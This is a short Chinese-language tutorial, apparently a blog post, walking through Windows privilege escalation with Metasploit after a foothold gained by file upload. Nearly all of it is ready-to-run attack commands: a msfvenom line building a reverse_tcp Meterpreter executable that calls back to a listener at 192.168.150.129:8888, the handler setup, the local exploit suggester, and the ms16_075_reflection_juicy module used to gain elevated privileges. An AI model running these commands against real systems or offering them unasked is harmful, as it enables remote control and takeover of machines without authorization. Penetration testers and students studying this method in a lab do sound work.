Metasploit简介
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
利用前提
可以进行文件上传并执行。如已经通过蚁剑连接了目标服务器
提权一般流程
在kali上生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.150.129 lport=8888 -f exe -o payload.exe
将木马上传到目标服务器并执行
进入msf进行监听
#开启监听
use exploit/multi/handler
#设置payload,本地kali的ip和端口
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.150.129
set lport 8888
run
进行信息收集,查看系统信息和当前权限,当前权限为普通用户![](https://i-blog.csdnimg.cn/blog_migrate/2a16fa8592bf35cb2c2d6ded8c8848e1.png)
挂起会话进入本地提权模块探测系统存在的exploit
background 挂起会话
use post/multi/recon/local_exploit_suggester
#options
#sessions -l
set session 1
run
发现有五个exploit可以利用
选择相应的exploit模块进行攻击
use exploit/windows/local/ms16_075_reflection_juicy
options
配置session
set session 1
run
提权成功